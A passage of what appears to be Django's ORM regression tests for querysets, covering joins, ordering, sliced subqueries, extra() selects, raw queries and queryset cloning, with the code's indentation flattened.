# because change_map contains a circular reference (#26522).
s1 = School.objects.create()
s2 = School.objects.create()
s3 = School.objects.create()
t1 = Teacher.objects.create()
otherteachers = Teacher.objects.exclude(pk=t1.pk).exclude(friends=t1)
qs1 = otherteachers.filter(schools=s1).filter(schools=s2)
qs2 = otherteachers.filter(schools=s1).filter(schools=s3)
self.assertQuerysetEqual(qs1 | qs2, [])
def test_ticket7095(self):
# Updates that are filtered on the model being updated are somewhat
# tricky in MySQL.
ManagedModel.objects.create(data='mm1', tag=self.t1, public=True)
self.assertEqual(ManagedModel.objects.update(data='mm'), 1)
# A values() or values_list() query across joined models must use outer
# joins appropriately.
# Note: In Oracle, we expect a null CharField to return '' instead of
# None.
if connection.features.interprets_empty_strings_as_nulls:
expected_null_charfield_repr = ''
else:
expected_null_charfield_repr = None
self.assertSequenceEqual(
Report.objects.values_list("creator__extra__info", flat=True).order_by("name"),
['e1', 'e2', expected_null_charfield_repr],
)
# Similarly for select_related(), joins beyond an initial nullable join
# must use outer joins so that all results are included.
self.assertSequenceEqual(
Report.objects.select_related("creator", "creator__extra").order_by("name"),
[self.r1, self.r2, self.r3]
)
# When there are multiple paths to a table from another table, we have
# to be careful not to accidentally reuse an inappropriate join when
# using select_related(). We used to return the parent's Detail record
# here by mistake.
d1 = Detail.objects.create(data="d1")
d2 = Detail.objects.create(data="d2")
m1 = Member.objects.create(name="m1", details=d1)
m2 = Member.objects.create(name="m2", details=d2)
Child.objects.create(person=m2, parent=m1)
obj = m1.children.select_related("person__details")[0]
self.assertEqual(obj.person.details.data, 'd2')
def test_order_by_resetting(self):
# Calling order_by() with no parameters removes any existing ordering on the
# model. But it should still be possible to add new ordering after that.
qs = Author.objects.order_by().order_by('name')
self.assertIn('ORDER BY', qs.query.get_compiler(qs.db).as_sql()[0])
def test_order_by_reverse_fk(self):
# It is possible to order by reverse of foreign key, although that can lead
# to duplicate results.
c1 = SimpleCategory.objects.create(name="category1")
c2 = SimpleCategory.objects.create(name="category2")
CategoryItem.objects.create(category=c1)
CategoryItem.objects.create(category=c2)
CategoryItem.objects.create(category=c1)
self.assertSequenceEqual(SimpleCategory.objects.order_by('categoryitem', 'pk'), [c1, c2, c1])
def test_filter_reverse_non_integer_pk(self):
date_obj = DateTimePK.objects.create()
extra_obj = ExtraInfo.objects.create(info='extra', date=date_obj)
self.assertEqual(
DateTimePK.objects.filter(extrainfo=extra_obj).get(),
date_obj,
)
def test_ticket10181(self):
# Avoid raising an EmptyResultSet if an inner query is probably
# empty (and hence, not executed).
self.assertQuerysetEqual(
Tag.objects.filter(id__in=Tag.objects.filter(id__in=[])),
[]
)
def test_ticket15316_filter_false(self):
c1 = SimpleCategory.objects.create(name="category1")
c2 = SpecialCategory.objects.create(name="named category1", special_name="special1")
c3 = SpecialCategory.objects.create(name="named category2", special_name="special2")
CategoryItem.objects.create(category=c1)
ci2 = CategoryItem.objects.create(category=c2)
ci3 = CategoryItem.objects.create(category=c3)
qs = CategoryItem.objects.filter(category__specialcategory__isnull=False)
self.assertEqual(qs.count(), 2)
self.assertSequenceEqual(qs, [ci2, ci3])
def test_ticket15316_exclude_false(self):
c1 = SimpleCategory.objects.create(name="category1")
c2 = SpecialCategory.objects.create(name="named category1", special_name="special1")
c3 = SpecialCategory.objects.create(name="named category2", special_name="special2")
ci1 = CategoryItem.objects.create(category=c1)
CategoryItem.objects.create(category=c2)
CategoryItem.objects.create(category=c3)
qs = CategoryItem.objects.exclude(category__specialcategory__isnull=False)
self.assertEqual(qs.count(), 1)
self.assertSequenceEqual(qs, [ci1])
def test_ticket15316_filter_true(self):
c1 = SimpleCategory.objects.create(name="category1")
c2 = SpecialCategory.objects.create(name="named category1", special_name="special1")
c3 = SpecialCategory.objects.create(name="named category2", special_name="special2")
ci1 = CategoryItem.objects.create(category=c1)
CategoryItem.objects.create(category=c2)
CategoryItem.objects.create(category=c3)
qs = CategoryItem.objects.filter(category__specialcategory__isnull=True)
self.assertEqual(qs.count(), 1)
self.assertSequenceEqual(qs, [ci1])
def test_ticket15316_exclude_true(self):
c1 = SimpleCategory.objects.create(name="category1")
c2 = SpecialCategory.objects.create(name="named category1", special_name="special1")
c3 = SpecialCategory.objects.create(name="named category2", special_name="special2")
CategoryItem.objects.create(category=c1)
ci2 = CategoryItem.objects.create(category=c2)
ci3 = CategoryItem.objects.create(category=c3)
qs = CategoryItem.objects.exclude(category__specialcategory__isnull=True)
self.assertEqual(qs.count(), 2)
self.assertSequenceEqual(qs, [ci2, ci3])
def test_ticket15316_one2one_filter_false(self):
c = SimpleCategory.objects.create(name="cat")
c0 = SimpleCategory.objects.create(name="cat0")
c1 = SimpleCategory.objects.create(name="category1")
OneToOneCategory.objects.create(category=c1, new_name="new1")
OneToOneCategory.objects.create(category=c0, new_name="new2")
CategoryItem.objects.create(category=c)
ci2 = CategoryItem.objects.create(category=c0)
ci3 = CategoryItem.objects.create(category=c1)
qs = CategoryItem.objects.filter(category__onetoonecategory__isnull=False).order_by('pk')
self.assertEqual(qs.count(), 2)
self.assertSequenceEqual(qs, [ci2, ci3])
def test_ticket15316_one2one_exclude_false(self):
c = SimpleCategory.objects.create(name="cat")
c0 = SimpleCategory.objects.create(name="cat0")
c1 = SimpleCategory.objects.create(name="category1")
OneToOneCategory.objects.create(category=c1, new_name="new1")
OneToOneCategory.objects.create(category=c0, new_name="new2")
ci1 = CategoryItem.objects.create(category=c)
CategoryItem.objects.create(category=c0)
CategoryItem.objects.create(category=c1)
qs = CategoryItem.objects.exclude(category__onetoonecategory__isnull=False)
self.assertEqual(qs.count(), 1)
self.assertSequenceEqual(qs, [ci1])
def test_ticket15316_one2one_filter_true(self):
c = SimpleCategory.objects.create(name="cat")
c0 = SimpleCategory.objects.create(name="cat0")
c1 = SimpleCategory.objects.create(name="category1")
OneToOneCategory.objects.create(category=c1, new_name="new1")
OneToOneCategory.objects.create(category=c0, new_name="new2")
ci1 = CategoryItem.objects.create(category=c)
CategoryItem.objects.create(category=c0)
CategoryItem.objects.create(category=c1)
qs = CategoryItem.objects.filter(category__onetoonecategory__isnull=True)
self.assertEqual(qs.count(), 1)
self.assertSequenceEqual(qs, [ci1])
def test_ticket15316_one2one_exclude_true(self):
c = SimpleCategory.objects.create(name="cat")
c0 = SimpleCategory.objects.create(name="cat0")
c1 = SimpleCategory.objects.create(name="category1")
OneToOneCategory.objects.create(category=c1, new_name="new1")
OneToOneCategory.objects.create(category=c0, new_name="new2")
CategoryItem.objects.create(category=c)
ci2 = CategoryItem.objects.create(category=c0)
ci3 = CategoryItem.objects.create(category=c1)
qs = CategoryItem.objects.exclude(category__onetoonecategory__isnull=True).order_by('pk')
self.assertEqual(qs.count(), 2)
self.assertSequenceEqual(qs, [ci2, ci3])
class Queries5Tests(TestCase):
@classmethod
def setUpTestData(cls):
# Ordering by 'rank' gives us rank2, rank1, rank3. Ordering by the
# Meta.ordering will be rank3, rank2, rank1.
cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
cls.n2 = Note.objects.create(note='n2', misc='bar', id=2)
e1 = ExtraInfo.objects.create(info='e1', note=cls.n1)
e2 = ExtraInfo.objects.create(info='e2', note=cls.n2)
a1 = Author.objects.create(name='a1', num=1001, extra=e1)
a2 = Author.objects.create(name='a2', num=2002, extra=e1)
a3 = Author.objects.create(name='a3', num=3003, extra=e2)
cls.rank2 = Ranking.objects.create(rank=2, author=a2)
cls.rank1 = Ranking.objects.create(rank=1, author=a3)
cls.rank3 = Ranking.objects.create(rank=3, author=a1)
def test_ordering(self):
# Cross model ordering is possible in Meta, too.
self.assertSequenceEqual(
Ranking.objects.all(),
[self.rank3, self.rank2, self.rank1],
)
self.assertSequenceEqual(
Ranking.objects.all().order_by('rank'),
[self.rank1, self.rank2, self.rank3],
)
# Ordering of extra() pieces is possible, too and you can mix extra
# fields and model fields in the ordering.
self.assertSequenceEqual(
Ranking.objects.extra(tables=['django_site'], order_by=['-django_site.id', 'rank']),
[self.rank1, self.rank2, self.rank3],
)
sql = 'case when %s > 2 then 1 else 0 end' % connection.ops.quote_name('rank')
qs = Ranking.objects.extra(select={'good': sql})
self.assertEqual(
[o.good for o in qs.extra(order_by=('-good',))],
[True, False, False]
)
self.assertSequenceEqual(
qs.extra(order_by=('-good', 'id')),
[self.rank3, self.rank2, self.rank1],
)
# Despite having some extra aliases in the query, we can still omit
# them in a values() query.
dicts = qs.values('id', 'rank').order_by('id')
self.assertEqual(
[d['rank'] for d in dicts],
[2, 1, 3]
)
def test_ticket7256(self):
# An empty values() call includes all aliases, including those from an
# extra()
sql = 'case when %s > 2 then 1 else 0 end' % connection.ops.quote_name('rank')
qs = Ranking.objects.extra(select={'good': sql})
dicts = qs.values().order_by('id')
for d in dicts:
del d['id']
del d['author_id']
self.assertEqual(
[sorted(d.items()) for d in dicts],
[[('good', 0), ('rank', 2)], [('good', 0), ('rank', 1)], [('good', 1), ('rank', 3)]]
)
def test_ticket7045(self):
# Extra tables used to crash SQL construction on the second use.
qs = Ranking.objects.extra(tables=['django_site'])
qs.query.get_compiler(qs.db).as_sql()
# test passes if this doesn't raise an exception.
qs.query.get_compiler(qs.db).as_sql()
def test_ticket9848(self):
# Make sure that updates which only filter on sub-tables don't
# inadvertently update the wrong records (bug #9848).
author_start = Author.objects.get(name='a1')
ranking_start = Ranking.objects.get(author__name='a1')
# Make sure that the IDs from different tables don't happen to match.
self.assertSequenceEqual(
Ranking.objects.filter(author__name='a1'),
[self.rank3],
)
self.assertEqual(
Ranking.objects.filter(author__name='a1').update(rank=4636),
1
)
r = Ranking.objects.get(author__name='a1')
self.assertEqual(r.id, ranking_start.id)
self.assertEqual(r.author.id, author_start.id)
self.assertEqual(r.rank, 4636)
r.rank = 3
r.save()
self.assertSequenceEqual(
Ranking.objects.all(),
[self.rank3, self.rank2, self.rank1],
)
def test_ticket5261(self):
# Test different empty excludes.
self.assertSequenceEqual(
Note.objects.exclude(Q()),
[self.n1, self.n2],
)
self.assertSequenceEqual(
Note.objects.filter(~Q()),
[self.n1, self.n2],
)
self.assertSequenceEqual(
Note.objects.filter(~Q() | ~Q()),
[self.n1, self.n2],
)
self.assertSequenceEqual(
Note.objects.exclude(~Q() & ~Q()),
[self.n1, self.n2],
)
def test_extra_select_literal_percent_s(self):
# Allow %%s to escape select clauses
self.assertEqual(
Note.objects.extra(select={'foo': "'%%s'"})[0].foo,
'%s'
)
self.assertEqual(
Note.objects.extra(select={'foo': "'%%s bar %%s'"})[0].foo,
'%s bar %s'
)
self.assertEqual(
Note.objects.extra(select={'foo': "'bar %%s'"})[0].foo,
'bar %s'
)
def test_queryset_reuse(self):
# Using querysets doesn't mutate aliases.
authors = Author.objects.filter(Q(name='a1') | Q(name='nonexistent'))
self.assertEqual(Ranking.objects.filter(author__in=authors).get(), self.rank3)
self.assertEqual(authors.count(), 1)
class SelectRelatedTests(TestCase):
def test_tickets_3045_3288(self):
# Once upon a time, select_related() with circular relations would loop
# infinitely if you forgot to specify "depth". Now we set an arbitrary
# default upper bound.
self.assertQuerysetEqual(X.objects.all(), [])
self.assertQuerysetEqual(X.objects.select_related(), [])
class SubclassFKTests(TestCase):
def test_ticket7778(self):
# Model subclasses could not be deleted if a nullable foreign key
# relates to a model that relates back.
num_celebs = Celebrity.objects.count()
tvc = TvChef.objects.create(name="Huey")
self.assertEqual(Celebrity.objects.count(), num_celebs + 1)
Fan.objects.create(fan_of=tvc)
Fan.objects.create(fan_of=tvc)
tvc.delete()
# The parent object should have been deleted as well.
self.assertEqual(Celebrity.objects.count(), num_celebs)
class CustomPkTests(TestCase):
def test_ticket7371(self):
self.assertQuerysetEqual(Related.objects.order_by('custom'), [])
class NullableRelOrderingTests(TestCase):
def test_ticket10028(self):
# Ordering by model related to nullable relations(!) should use outer
# joins, so that all results are included.
p1 = Plaything.objects.create(name="p1")
self.assertSequenceEqual(Plaything.objects.all(), [p1])
def test_join_already_in_query(self):
# Ordering by model related to nullable relations should not change
# the join type of already existing joins.
Plaything.objects.create(name="p1")
s = SingleObject.objects.create(name='s')
r = RelatedObject.objects.create(single=s, f=1)
p2 = Plaything.objects.create(name="p2", others=r)
qs = Plaything.objects.all().filter(others__isnull=False).order_by('pk')
self.assertNotIn('JOIN', str(qs.query))
qs = Plaything.objects.all().filter(others__f__isnull=False).order_by('pk')
self.assertIn('INNER', str(qs.query))
qs = qs.order_by('others__single__name')
# The ordering by others__single__pk will add one new join (to single)
# and that join must be LEFT join. The already existing join to related
# objects must be kept INNER. So, we have both an INNER and a LEFT join
# in the query.
self.assertEqual(str(qs.query).count('LEFT'), 1)
self.assertEqual(str(qs.query).count('INNER'), 1)
self.assertSequenceEqual(qs, [p2])
class DisjunctiveFilterTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
cls.e1 = ExtraInfo.objects.create(info='e1', note=cls.n1)
def test_ticket7872(self):
# Another variation on the disjunctive filtering theme.
# For the purposes of this regression test, it's important that there is no
# Join object related to the LeafA we create.
l1 = LeafA.objects.create(data='first')
self.assertSequenceEqual(LeafA.objects.all(), [l1])
self.assertSequenceEqual(
LeafA.objects.filter(Q(data='first') | Q(join__b__data='second')),
[l1],
)
def test_ticket8283(self):
# Checking that applying filters after a disjunction works correctly.
self.assertSequenceEqual(
(ExtraInfo.objects.filter(note=self.n1) | ExtraInfo.objects.filter(info='e2')).filter(note=self.n1),
[self.e1],
)
self.assertSequenceEqual(
(ExtraInfo.objects.filter(info='e2') | ExtraInfo.objects.filter(note=self.n1)).filter(note=self.n1),
[self.e1],
)
class Queries6Tests(TestCase):
@classmethod
def setUpTestData(cls):
generic = NamedCategory.objects.create(name="Generic")
cls.t1 = Tag.objects.create(name='t1', category=generic)
cls.t2 = Tag.objects.create(name='t2', parent=cls.t1, category=generic)
cls.t3 = Tag.objects.create(name='t3', parent=cls.t1)
cls.t4 = Tag.objects.create(name='t4', parent=cls.t3)
cls.t5 = Tag.objects.create(name='t5', parent=cls.t3)
n1 = Note.objects.create(note='n1', misc='foo', id=1)
cls.ann1 = Annotation.objects.create(name='a1', tag=cls.t1)
cls.ann1.notes.add(n1)
cls.ann2 = Annotation.objects.create(name='a2', tag=cls.t4)
def test_parallel_iterators(self):
# Parallel iterators work.
qs = Tag.objects.all()
i1, i2 = iter(qs), iter(qs)
self.assertEqual(repr(next(i1)), '<Tag: t1>')
self.assertEqual(repr(next(i1)), '<Tag: t2>')
self.assertEqual(repr(next(i2)), '<Tag: t1>')
self.assertEqual(repr(next(i2)), '<Tag: t2>')
self.assertEqual(repr(next(i2)), '<Tag: t3>')
self.assertEqual(repr(next(i1)), '<Tag: t3>')
qs = X.objects.all()
self.assertFalse(qs)
self.assertFalse(qs)
def test_nested_queries_sql(self):
# Nested queries should not evaluate the inner query as part of constructing the
# SQL (so we should see a nested query here, indicated by two "SELECT" calls).
qs = Annotation.objects.filter(notes__in=Note.objects.filter(note="xyzzy"))
self.assertEqual(
qs.query.get_compiler(qs.db).as_sql()[0].count('SELECT'),
2
)
def test_tickets_8921_9188(self):
# Incorrect SQL was being generated for certain types of exclude()
# queries that crossed multi-valued relations (#8921, #9188 and some
# preemptively discovered cases).
self.assertSequenceEqual(
PointerA.objects.filter(connection__pointerb__id=1),
[]
)
self.assertSequenceEqual(
PointerA.objects.exclude(connection__pointerb__id=1),
[]
)
self.assertSequenceEqual(
Tag.objects.exclude(children=None),
[self.t1, self.t3],
)
# This example is tricky because the parent could be NULL, so only checking
# parents with annotations omits some results (tag t1, in this case).
self.assertSequenceEqual(
Tag.objects.exclude(parent__annotation__name="a1"),
[self.t1, self.t4, self.t5],
)
# The annotation->tag link is single values and tag->children links is
# multi-valued. So we have to split the exclude filter in the middle
# and then optimize the inner query without losing results.
self.assertSequenceEqual(
Annotation.objects.exclude(tag__children__name="t2"),
[self.ann2],
)
# Nested queries are possible (although should be used with care, since
# they have performance problems on backends like MySQL.
self.assertSequenceEqual(
Annotation.objects.filter(notes__in=Note.objects.filter(note="n1")),
[self.ann1],
)
def test_ticket3739(self):
# The all() method on querysets returns a copy of the queryset.
q1 = Tag.objects.order_by('name')
self.assertIsNot(q1, q1.all())
def test_ticket_11320(self):
qs = Tag.objects.exclude(category=None).exclude(category__name='foo')
self.assertEqual(str(qs.query).count(' INNER JOIN '), 1)
def test_distinct_ordered_sliced_subquery_aggregation(self):
self.assertEqual(Tag.objects.distinct().order_by('category__name')[:3].count(), 3)
def test_multiple_columns_with_the_same_name_slice(self):
self.assertEqual(
list(Tag.objects.order_by('name').values_list('name', 'category__name')[:2]),
[('t1', 'Generic'), ('t2', 'Generic')],
)
self.assertSequenceEqual(
Tag.objects.order_by('name').select_related('category')[:2],
[self.t1, self.t2],
)
self.assertEqual(
list(Tag.objects.order_by('-name').values_list('name', 'parent__name')[:2]),
[('t5', 't3'), ('t4', 't3')],
)
self.assertSequenceEqual(
Tag.objects.order_by('-name').select_related('parent')[:2],
[self.t5, self.t4],
)
def test_col_alias_quoted(self):
with CaptureQueriesContext(connection) as captured_queries:
self.assertEqual(
Tag.objects.values('parent').annotate(
tag_per_parent=Count('pk'),
).aggregate(Max('tag_per_parent')),
{'tag_per_parent__max': 2},
)
sql = captured_queries[0]['sql']
self.assertIn('AS %s' % connection.ops.quote_name('col1'), sql)
class RawQueriesTests(TestCase):
@classmethod
def setUpTestData(cls):
Note.objects.create(note='n1', misc='foo', id=1)
def test_ticket14729(self):
# Test representation of raw query with one or few parameters passed as list
query = "SELECT * FROM queries_note WHERE note = %s"
params = ['n1']
qs = Note.objects.raw(query, params=params)
self.assertEqual(repr(qs), "<RawQuerySet: SELECT * FROM queries_note WHERE note = n1>")
query = "SELECT * FROM queries_note WHERE note = %s and misc = %s"
params = ['n1', 'foo']
qs = Note.objects.raw(query, params=params)
self.assertEqual(repr(qs), "<RawQuerySet: SELECT * FROM queries_note WHERE note = n1 and misc = foo>")
class GeneratorExpressionTests(SimpleTestCase):
def test_ticket10432(self):
# Using an empty iterator as the rvalue for an "__in"
# lookup is legal.
self.assertCountEqual(Note.objects.filter(pk__in=iter(())), [])
class ComparisonTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
e1 = ExtraInfo.objects.create(info='e1', note=cls.n1)
cls.a2 = Author.objects.create(name='a2', num=2002, extra=e1)
def test_ticket8597(self):
# Regression tests for case-insensitive comparisons
item_ab = Item.objects.create(name="a_b", created=datetime.datetime.now(), creator=self.a2, note=self.n1)
item_xy = Item.objects.create(name="x%y", created=datetime.datetime.now(), creator=self.a2, note=self.n1)
self.assertSequenceEqual(
Item.objects.filter(name__iexact="A_b"),
[item_ab],
)
self.assertSequenceEqual(
Item.objects.filter(name__iexact="x%Y"),
[item_xy],
)
self.assertSequenceEqual(
Item.objects.filter(name__istartswith="A_b"),
[item_ab],
)
self.assertSequenceEqual(
Item.objects.filter(name__iendswith="A_b"),
[item_ab],
)
class ExistsSql(TestCase):
def test_exists(self):
with CaptureQueriesContext(connection) as captured_queries:
self.assertFalse(Tag.objects.exists())
# Ok - so the exist query worked - but did it include too many columns?
self.assertEqual(len(captured_queries), 1)
qstr = captured_queries[0]['sql']
id, name = connection.ops.quote_name('id'), connection.ops.quote_name('name')
self.assertNotIn(id, qstr)
self.assertNotIn(name, qstr)
def test_ticket_18414(self):
Article.objects.create(name='one', created=datetime.datetime.now())
Article.objects.create(name='one', created=datetime.datetime.now())
Article.objects.create(name='two', created=datetime.datetime.now())
self.assertTrue(Article.objects.exists())
self.assertTrue(Article.objects.distinct().exists())
self.assertTrue(Article.objects.distinct()[1:3].exists())
self.assertFalse(Article.objects.distinct()[1:1].exists())
@skipUnlessDBFeature('can_distinct_on_fields')
def test_ticket_18414_distinct_on(self):
Article.objects.create(name='one', created=datetime.datetime.now())
Article.objects.create(name='one', created=datetime.datetime.now())
Article.objects.create(name='two', created=datetime.datetime.now())
self.assertTrue(Article.objects.distinct('name').exists())
self.assertTrue(Article.objects.distinct('name')[1:2].exists())
self.assertFalse(Article.objects.distinct('name')[2:3].exists())
class QuerysetOrderedTests(unittest.TestCase):
"""
Tests for the Queryset.ordered attribute.
"""
def test_no_default_or_explicit_ordering(self):
self.assertIs(Annotation.objects.all().ordered, False)
def test_cleared_default_ordering(self):
self.assertIs(Tag.objects.all().ordered, True)
self.assertIs(Tag.objects.all().order_by().ordered, False)
def test_explicit_ordering(self):
self.assertIs(Annotation.objects.all().order_by('id').ordered, True)
def test_empty_queryset(self):
self.assertIs(Annotation.objects.none().ordered, True)
def test_order_by_extra(self):
self.assertIs(Annotation.objects.all().extra(order_by=['id']).ordered, True)
def test_annotated_ordering(self):
qs = Annotation.objects.annotate(num_notes=Count('notes'))
self.assertIs(qs.ordered, False)
self.assertIs(qs.order_by('num_notes').ordered, True)
def test_annotated_default_ordering(self):
qs = Tag.objects.annotate(num_notes=Count('pk'))
self.assertIs(qs.ordered, False)
self.assertIs(qs.order_by('name').ordered, True)
def test_annotated_values_default_ordering(self):
qs = Tag.objects.values('name').annotate(num_notes=Count('pk'))
self.assertIs(qs.ordered, False)
self.assertIs(qs.order_by('name').ordered, True)
@skipUnlessDBFeature('allow_sliced_subqueries_with_in')
class SubqueryTests(TestCase):
@classmethod
def setUpTestData(cls):
NamedCategory.objects.create(id=1, name='first')
NamedCategory.objects.create(id=2, name='second')
NamedCategory.objects.create(id=3, name='third')
NamedCategory.objects.create(id=4, name='fourth')
def test_ordered_subselect(self):
"Subselects honor any manual ordering"
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:2])
self.assertEqual(set(query.values_list('id', flat=True)), {3, 4})
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[:2])
self.assertEqual(set(query.values_list('id', flat=True)), {3, 4})
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:2])
self.assertEqual(set(query.values_list('id', flat=True)), {3})
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[2:])
self.assertEqual(set(query.values_list('id', flat=True)), {1, 2})
def test_slice_subquery_and_query(self):
"""
Slice a query that has a sliced subquery
"""
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:2])[0:2]
self.assertEqual({x.id for x in query}, {3, 4})
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:3])[1:3]
self.assertEqual({x.id for x in query}, {3})
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[2:])[1:]
self.assertEqual({x.id for x in query}, {2})
def test_related_sliced_subquery(self):
"""
Related objects constraints can safely contain sliced subqueries.
refs #22434
"""
generic = NamedCategory.objects.create(id=5, name="Generic")
t1 = Tag.objects.create(name='t1', category=generic)
t2 = Tag.objects.create(name='t2', category=generic)
ManagedModel.objects.create(data='mm1', tag=t1, public=True)
mm2 = ManagedModel.objects.create(data='mm2', tag=t2, public=True)
query = ManagedModel.normal_manager.filter(
tag__in=Tag.objects.order_by('-id')[:1]
)
self.assertEqual({x.id for x in query}, {mm2.id})
def test_sliced_delete(self):
"Delete queries can safely contain sliced subqueries"
DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:1]).delete()
self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {1, 2, 3})
DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:2]).delete()
self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {1, 3})
DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:]).delete()
self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {3})
def test_distinct_ordered_sliced_subquery(self):
# Implicit values('id').
self.assertSequenceEqual(
NamedCategory.objects.filter(
id__in=NamedCategory.objects.distinct().order_by('name')[0:2],
).order_by('name').values_list('name', flat=True), ['first', 'fourth']
)
# Explicit values('id').
self.assertSequenceEqual(
NamedCategory.objects.filter(
id__in=NamedCategory.objects.distinct().order_by('-name').values('id')[0:2],
).order_by('name').values_list('name', flat=True), ['second', 'third']
)
# Annotated value.
self.assertSequenceEqual(
DumbCategory.objects.filter(
id__in=DumbCategory.objects.annotate(
double_id=F('id') * 2
).order_by('id').distinct().values('double_id')[0:2],
).order_by('id').values_list('id', flat=True), [2, 4]
)
class QuerySetBitwiseOperationTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.school = School.objects.create()
cls.room_1 = Classroom.objects.create(school=cls.school, has_blackboard=False, name='Room 1')
cls.room_2 = Classroom.objects.create(school=cls.school, has_blackboard=True, name='Room 2')
cls.room_3 = Classroom.objects.create(school=cls.school, has_blackboard=True, name='Room 3')
cls.room_4 = Classroom.objects.create(school=cls.school, has_blackboard=False, name='Room 4')
@skipUnlessDBFeature('allow_sliced_subqueries_with_in')
def test_or_with_rhs_slice(self):
qs1 = Classroom.objects.filter(has_blackboard=True)
qs2 = Classroom.objects.filter(has_blackboard=False)[:1]
self.assertCountEqual(qs1 | qs2, [self.room_1, self.room_2, self.room_3])
@skipUnlessDBFeature('allow_sliced_subqueries_with_in')
def test_or_with_lhs_slice(self):
qs1 = Classroom.objects.filter(has_blackboard=True)[:1]
qs2 = Classroom.objects.filter(has_blackboard=False)
self.assertCountEqual(qs1 | qs2, [self.room_1, self.room_2, self.room_4])
@skipUnlessDBFeature('allow_sliced_subqueries_with_in')
def test_or_with_both_slice(self):
qs1 = Classroom.objects.filter(has_blackboard=False)[:1]
qs2 = Classroom.objects.filter(has_blackboard=True)[:1]
self.assertCountEqual(qs1 | qs2, [self.room_1, self.room_2])
@skipUnlessDBFeature('allow_sliced_subqueries_with_in')
def test_or_with_both_slice_and_ordering(self):
qs1 = Classroom.objects.filter(has_blackboard=False).order_by('-pk')[:1]
qs2 = Classroom.objects.filter(has_blackboard=True).order_by('-name')[:1]
self.assertCountEqual(qs1 | qs2, [self.room_3, self.room_4])
def test_subquery_aliases(self):
combined = School.objects.filter(pk__isnull=False) & School.objects.filter(
Exists(Classroom.objects.filter(
has_blackboard=True,
school=OuterRef('pk'),
)),
)
self.assertSequenceEqual(combined, [self.school])
nested_combined = School.objects.filter(pk__in=combined.values('pk'))
self.assertSequenceEqual(nested_combined, [self.school])
class CloneTests(TestCase):
def test_evaluated_queryset_as_argument(self):
"#13227 -- If a queryset is already evaluated, it can still be used as a query arg"
n = Note(note='Test1', misc='misc')
n.save()
e = ExtraInfo(info='good', note=n)
e.save()
n_list = Note.objects.all()
# Evaluate the Note queryset, populating the query cache
list(n_list)
# Make one of cached results unpickable.
n_list._result_cache[0].lock = Lock()
with self.assertRaises(TypeError):
pickle.dumps(n_list)
# Use the note queryset in a query, and evaluate
# that query in a way that involves cloning.
self.assertEqual(ExtraInfo.objects.filter(note__in=n_list)[0].info, 'good')
def test_no_model_options_cloning(self):
"""
Cloning a queryset does not get out of hand. While complete
testing is impossible, this is a sanity check against invalid use of
deepcopy. refs #16759.
"""
opts_class = type(Note._meta)
note_deepcopy = getattr(opts_class, "__deepcopy__", None)
opts_class.__deepcopy__ = lambda obj, memo: self.fail("Model options shouldn't be cloned.")
try:
Note.objects.filter(pk__lte=F('pk') + 1).all()
finally:
if note_deepcopy is None:
delattr(opts_class, "__deepcopy__")
else:
opts_class.__deepcopy__ = note_deepcopy
def test_no_fields_cloning(self):
"""
Cloning a queryset does not get out of hand. While complete
testing is impossible, this is a sanity check against invalid use of
deepcopy. refs #16759.
"""
opts_class = type(Note._meta.get_field("misc"))
note_deepcopy = getattr(opts_class, "__deepcopy__", None)
opts_class.__deepcopy__ = lambda obj, memo: self.fail("Model fields shouldn't be cloned")
try:
Note.objects.filter(note=F('misc')).all()
finally:
if note_deepcopy is None:
delattr(opts_class, "__deepcopy__")
else:
opts_class.__deepcopy__ = note_deepcopy
class EmptyQuerySetTests(SimpleTestCase):
def test_emptyqueryset_values(self):
# #14366 -- Calling .values() on an empty QuerySet and then cloning
# that should not cause an error
self.assertCountEqual(Number.objects.none().values('num').order_by('num'), [])
def test_values_subquery(self):
self.assertCountEqual(Number.objects.filter(pk__in=Number.objects.none().values('pk')), [])
self.assertCountEqual(Number.objects.filter(pk__in=Number.objects.none().values_list('pk')), [])
def test_ticket_19151(self):
# #19151 -- Calling .values() or .values_list() on an empty QuerySet
# should return an empty QuerySet and not cause an error.
q = Author.objects.none()
self.assertCountEqual(q.values(), [])
self.assertCountEqual(q.values_list(), [])
class ValuesQuerysetTests(TestCase):
@classmethod
def setUpTestData(cls):
Number.objects.create(num=72)
def test_flat_values_list(self):
qs = Number.objects.values_list("num")
qs = qs.values_list("num", flat=True)
self.assertSequenceEqual(qs, [72])
def test_extra_values(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(select={'value_plus_x': 'num+%s', 'value_minus_x': 'num-%s'}, select_params=(1, 2))
qs = qs.order_by('value_minus_x')
qs = qs.values('num')
self.assertSequenceEqual(qs, [{'num': 72}])
def test_extra_values_order_twice(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(select={'value_plus_one': 'num+1', 'value_minus_one': 'num-1'})
qs = qs.order_by('value_minus_one').order_by('value_plus_one')
qs = qs.values('num')
self.assertSequenceEqual(qs, [{'num': 72}])
def test_extra_values_order_multiple(self):
# Postgres doesn't allow constants in order by, so check for that.
qs = Number.objects.extra(select={
'value_plus_one': 'num+1',
'value_minus_one': 'num-1',
'constant_value': '1'
})
qs = qs.order_by('value_plus_one', 'value_minus_one', 'constant_value')
qs = qs.values('num')
self.assertSequenceEqual(qs, [{'num': 72}])
def test_extra_values_order_in_extra(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(
select={'value_plus_one': 'num+1', 'value_minus_one': 'num-1'},
order_by=['value_minus_one'],
)
qs = qs.values('num')
